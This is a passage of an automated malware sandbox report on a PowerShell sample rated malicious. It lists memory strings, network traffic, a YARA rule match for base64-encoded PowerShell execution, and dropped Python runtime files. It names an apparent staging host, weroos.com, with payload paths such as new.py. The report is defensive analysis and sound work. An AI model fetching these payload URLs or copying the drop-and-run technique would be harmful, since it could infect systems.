        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE36711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2B681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE37D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://weroos.com
        Source: powershell.exe, 00000014.00000002.2426086444.0000025F298A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsoft.com
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: powershell.exe, 00000014.00000002.2450559465.0000025F44830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D48A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pythonlabs.com/logos.html
        Source: python.exe, 00000018.00000003.2072269174.0000023C74402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/book/ch03.pdf
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE37D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1686220805.000001CE37D6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=QghPBNdzUgTrevgZUhntZq2goAA8bDA9b9DS3h0nILEowfQX883iDCeTRY1
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE36711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2B681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bootstrap.pypa.io
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bootstrap.pypa.io/get-pip.py
        Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: python.exe, 00000018.00000003.2023980303.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2024935913.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2022940624.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2016923190.0000023C74378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kennethreitz/requests/pull/2567.
        Source: python.exe, 00000018.00000003.2067241943.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2063316044.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2031495522.0000023C7436A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2078461681.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2055692185.0000023C7436C000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2072269174.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2101837162.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2075816910.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2065656418.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2060621815.0000023C7436B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2027368506.0000023C74356000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2058908335.0000023C7436B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2069870001.0000023C7436D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev
        Source: python.exe, 00000018.00000003.2013835157.0000023C74203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/pip/issues/7498.
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE37569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000013.00000002.1689899872.000001CE468C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1689899872.000001CE46785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE37569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1686220805.000001CE37D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weroos.com
        Source: powershell.exe, 00000013.00000002.1686220805.000001CE36941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weroos.com/SDkwjk.txt
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weroos.com/new.py
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cnri.reston.va.us)
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cwi.nl)
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.8/python-3.11.8-embed-amd64.zip
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/)
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.189.173.4:443 -> 192.168.2.16:49758 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.16:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.63.92:443 -> 192.168.2.16:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.64.223:443 -> 192.168.2.16:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.0.175:443 -> 192.168.2.16:49767 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_msi.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_queue.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\unicodedata.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_multiprocessing.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_hashlib.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_ssl.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\python.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\python311.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_sqlite3.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_socket.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\winsound.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\select.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\libssl-3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_ctypes.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_decimal.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_zoneinfo.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_asyncio.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_elementtree.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_uuid.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_lzma.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_overlapped.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\vcruntime140.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\pythonw.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\vcruntime140_1.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_bz2.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\pyexpat.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\libffi-8.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\libcrypto-3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\python3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E0F6519_2_00007FFF7F8E0F65
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E1B9019_2_00007FFF7F8E1B90
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E18A219_2_00007FFF7F8E18A2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F83613220_2_00007FFF7F836132
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F83642020_2_00007FFF7F836420
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F83406520_2_00007FFF7F834065
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80686A35026_2_00007FF80686A350
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80687099426_2_00007FF806870994
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80686E59026_2_00007FF80686E590
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80686B58026_2_00007FF80686B580
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80686992026_2_00007FF806869920
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF806874EA826_2_00007FF806874EA8
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80686B2B026_2_00007FF80686B2B0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068742A426_2_00007FF8068742A4
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068746A426_2_00007FF8068746A4
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80686D2A026_2_00007FF80686D2A0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF806867E4926_2_00007FF806867E49
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068A106026_2_00007FF8068A1060
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C1BA026_2_00007FF8068C1BA0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C2FD026_2_00007FF8068C2FD0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C536026_2_00007FF8068C5360
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C5C9026_2_00007FF8068C5C90
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068CF8CC26_2_00007FF8068CF8CC
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C8CE026_2_00007FF8068C8CE0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C252026_2_00007FF8068C2520
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C12B026_2_00007FF8068C12B0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068C6E4C26_2_00007FF8068C6E4C
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068F3E8026_2_00007FF8068F3E80
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068FC79826_2_00007FF8068FC798
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068F2EC026_2_00007FF8068F2EC0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068F3BF026_2_00007FF8068F3BF0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068F100026_2_00007FF8068F1000
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068F607026_2_00007FF8068F6070
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF806917CA026_2_00007FF806917CA0
        Source: pythonw.exe.20.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: unicodedata.pyd.20.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: _overlapped.pyd.20.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: python3.dll.20.drStatic PE information: No import functions for PE file found
        Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.phis.evad.win@39/1409@90/17
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Y4TFCRJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngnzao2z.fzv.ps1Jump to behavior
        Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
